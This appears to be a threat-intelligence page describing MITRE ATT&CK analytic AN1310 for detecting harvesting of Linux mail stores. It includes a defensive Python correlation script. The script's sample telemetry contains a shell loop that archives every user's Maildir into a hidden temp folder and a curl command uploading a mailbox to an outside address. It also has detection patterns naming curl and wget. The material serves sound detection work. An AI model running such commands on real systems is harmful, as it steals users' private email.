AN1310: Analytic 1310
Detects file access to mbox/maildir files in conjunction with curl/wget/postfix execution, or anomalous shell scripts harvesting user mail directories.
Analyst context for executives and security teams
This analytic matters because it focuses on suspicious access to Linux user mail stores, especially when that access appears near curl, wget, postfix, or shell-script activity. For leaders, the practical issue is not just malware detection; it is whether the organization can prove when local email archives were accessed, by whom or what process, and whether that activity was normal administration or potential collection of sensitive communications.
Executive priority
Prioritize this where Linux systems host or cache user mail, because gaps in file-access and process telemetry can weaken incident scoping, privacy/compliance evidence, and executive confidence during a suspected data-access event. Security leaders should ask whether SOC and IR teams can correlate mail-store access with process execution and script activity on Linux, and whether those events are retained long enough to support investigations.
Technical view
ATT&CK supplies this as a Linux detection analytic with no tactic mapping and no separate detection logic. Defenders should validate correlation coverage for access to mbox/maildir files alongside execution of curl, wget, postfix, and anomalous shell scripts that enumerate or harvest user mail directories. Treat the analytic as a detection hypothesis requiring local tuning: distinguish expected mail service, backup, migration, and administrative activity from unusual user, process, path, timing, or volume patterns. In particular, postfix's own delivery agents write to mbox/maildir stores as part of normal delivery, so postfix near mail-file access is only meaningful when the process, user, parent, or path differs from the expected delivery chain.
Likely telemetry
- Linux process execution telemetry for curl, wget, postfix, shells, and script interpreters
- Linux file access telemetry for mbox/maildir paths and user mail directories
- Command-line arguments and parent/child process relationships
- User, UID/GID, host, working directory, and process metadata
- Script creation/execution evidence where available
Detection direction
- Confirm whether Linux endpoints and servers generate file-access events for relevant mbox/maildir locations; many environments log process execution but not file reads at useful fidelity. On stock Linux this usually requires auditd watch rules on the mail spool and user Maildir paths (a `-w <path> -p r` rule) or an EDR sensor that records file reads, since syslog and journald do not capture them.
- Correlate mail-store file access with nearby curl, wget, postfix, shell, or script execution rather than alerting on any single binary alone.
- Tune expected activity for legitimate mail services, mail migrations, backups, indexing, compliance archiving, and administrator troubleshooting.
- Review parent process, user context, execution path, command line, and timing to separate routine service behavior from anomalous shell-driven collection patterns.
- Because no official detection query is supplied, validate logic in the local environment before using it for high-severity alerting.
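The points above describe a correlation, not a query, so the following is an added example of how that correlation could be expressed over normalized Linux events. It is not MITRE's detection logic and not code from this page's source; the event schema, the mail-path patterns, the 60-second window, the three-mailbox volume threshold, and the tuned-out benign service contexts (postfix delivery agents, a Dovecot IMAP process, and a hypothetical `mailbackup.sh` cron job) are all assumptions to be replaced by local baselines, and the sample events are constructed.

```python
"""Correlate mail-store file reads with nearby curl/wget/postfix or shell
execution on Linux. Illustrative only: schema, paths and thresholds are
assumptions, not MITRE's detection logic."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Event:
    """Assumed normalized event (e.g. parsed auditd SYSCALL/PATH or EDR feed)."""
    ts: float          # epoch seconds
    host: str
    kind: str          # "exec" or "file_read"
    user: str
    comm: str          # process name
    parent: str = ""   # parent process name
    cmdline: str = ""  # command line (exec events)
    path: str = ""     # file path (file_read events)


# Assumed mail-store locations: system spool, per-user Maildir, per-user mbox.
MAIL_PATH = re.compile(r"/var/(?:spool/)?mail/|/Maildir\b|/mbox\b")
OWNER = re.compile(r"^/var/(?:spool/)?mail/([^/]+)|^/home/([^/]+)/")
SUSPECT_COMMS = {"curl", "wget", "postfix"}
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python3", "perl"}
# Local tuning (assumption): (comm, parent, user) tuples that touch mail
# stores as part of documented delivery, indexing or backup workflows.
BENIGN_CONTEXTS = {
    ("local", "master", "postfix"),
    ("virtual", "master", "postfix"),
    ("imap", "dovecot", "vmail"),
    ("tar", "mailbackup.sh", "backup"),   # hypothetical nightly backup job
}
BULK_THRESHOLD = 3   # distinct mailboxes one reader may touch per window


def is_mail_path(path):
    return bool(MAIL_PATH.search(path))


def mailbox_owner(path):
    """Map a mail file path to the mailbox owner, or the path itself if unknown."""
    m = OWNER.search(path)
    return (m.group(1) or m.group(2)) if m else path


def is_suspect_exec(ev):
    """curl/wget/postfix, or a shell/interpreter whose command line names mail stores."""
    if ev.kind != "exec":
        return False
    if ev.comm in SUSPECT_COMMS:
        return True
    return ev.comm in INTERPRETERS and is_mail_path(ev.cmdline)


def correlate(events, window=60.0):
    """Return alerts for mail-store reads near a suspect exec (same host and
    user) and for one reader touching many mailboxes, after tuning out
    benign service contexts."""
    events = sorted(events, key=lambda e: e.ts)
    suspect = defaultdict(list)
    for ev in events:
        if is_suspect_exec(ev):
            suspect[(ev.host, ev.user)].append(ev)

    alerts, reads = [], defaultdict(list)
    for ev in events:
        if ev.kind != "file_read" or not is_mail_path(ev.path):
            continue
        if (ev.comm, ev.parent, ev.user) in BENIGN_CONTEXTS:
            continue
        reads[(ev.host, ev.user, ev.comm, ev.parent)].append(ev)
        near = [x for x in suspect[(ev.host, ev.user)] if abs(x.ts - ev.ts) <= window]
        # A direct read by curl/wget/postfix is suspicious even if its exec was missed.
        if ev.comm in SUSPECT_COMMS or near:
            alerts.append({"rule": "mail_read_near_suspect_exec", "host": ev.host,
                           "user": ev.user, "reader": ev.comm, "path": ev.path,
                           "exec": [x.cmdline for x in near]})

    for (host, user, comm, parent), evs in reads.items():
        for i, first in enumerate(evs):   # sliding window per reader
            owners = {mailbox_owner(e.path) for e in evs[i:] if e.ts - first.ts <= window}
            if len(owners) >= BULK_THRESHOLD:
                alerts.append({"rule": "bulk_mailbox_access", "host": host, "user": user,
                               "reader": comm, "parent": parent, "mailboxes": sorted(owners)})
                break
    return alerts


# Constructed sample telemetry for one host; 203.0.113.9 is a documentation address.
SAMPLE_EVENTS = [
    Event(100, "mx1", "exec", "postfix", "local", "master", "local -t unix"),
    Event(101, "mx1", "file_read", "postfix", "local", "master", path="/var/mail/alice"),
    Event(200, "mx1", "exec", "root", "bash", "sshd",
          "bash -c 'for d in /home/*/Maildir; do tar czf /tmp/.c/$(basename $(dirname $d)).tgz $d; done'"),
    Event(201, "mx1", "file_read", "root", "tar", "bash", path="/home/alice/Maildir/cur/1700000001.M1.mx1"),
    Event(202, "mx1", "file_read", "root", "tar", "bash", path="/home/bob/Maildir/cur/1700000002.M1.mx1"),
    Event(203, "mx1", "file_read", "root", "tar", "bash", path="/home/carol/Maildir/new/1700000003.M1.mx1"),
    Event(300, "mx1", "exec", "www-data", "curl", "php-fpm", "curl -s -T /var/mail/alice http://203.0.113.9/up"),
    Event(300.2, "mx1", "file_read", "www-data", "curl", "php-fpm", path="/var/mail/alice"),
    Event(900, "mx1", "exec", "backup", "mailbackup.sh", "cron", "/usr/local/bin/mailbackup.sh"),
    Event(901, "mx1", "file_read", "backup", "tar", "mailbackup.sh", path="/var/mail/alice"),
    Event(902, "mx1", "file_read", "backup", "tar", "mailbackup.sh", path="/var/mail/bob"),
    Event(903, "mx1", "file_read", "backup", "tar", "mailbackup.sh", path="/var/mail/carol"),
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a)
```

Run against the constructed events, the postfix delivery and the tuned backup job produce nothing, the shell loop yields one alert per Maildir read plus a bulk-access alert because three mailboxes were touched inside one window, and the curl upload is flagged both by its exec and by curl itself reading the spool file. The bulk rule is what catches a harvesting script whose exec event was not captured; the `BENIGN_CONTEXTS` set is where the documented workflows from the tuning step belong, and every entry in it should be traceable to an owner.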
Mitigation priorities
- Identify Linux systems that store or process local mbox/maildir content and confirm ownership, business purpose, and logging requirements.
- Apply least-privilege access to user mail directories and restrict unnecessary interactive or script-based access where operationally feasible.
- Ensure approved administrative, backup, and mail-processing workflows are documented so detections can be tuned without suppressing meaningful anomalies.
- Review outbound use of curl and wget on mail-hosting systems and apply appropriate egress and execution controls consistent with business requirements.
- Preserve relevant Linux process, file-access, and script execution logs to support incident response and compliance evidence.
Analyst notes and limits
The supplied object is a detection analytic, not a technique, and has no relationship context. The most useful defensive value comes from turning the short analytic description into a local validation exercise: can the SOC see mail-store file access, correlate it with suspicious process activity, and explain benign exceptions?
Official detection logic, tactics, relationships, and aliases were not provided. This take is limited to the supplied Linux platform, analytic description, and external reference. Local mail architecture, logging configuration, and baseline administrative behavior are required to determine severity and coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 834e08246993… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] mitre-attack: AN1310
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.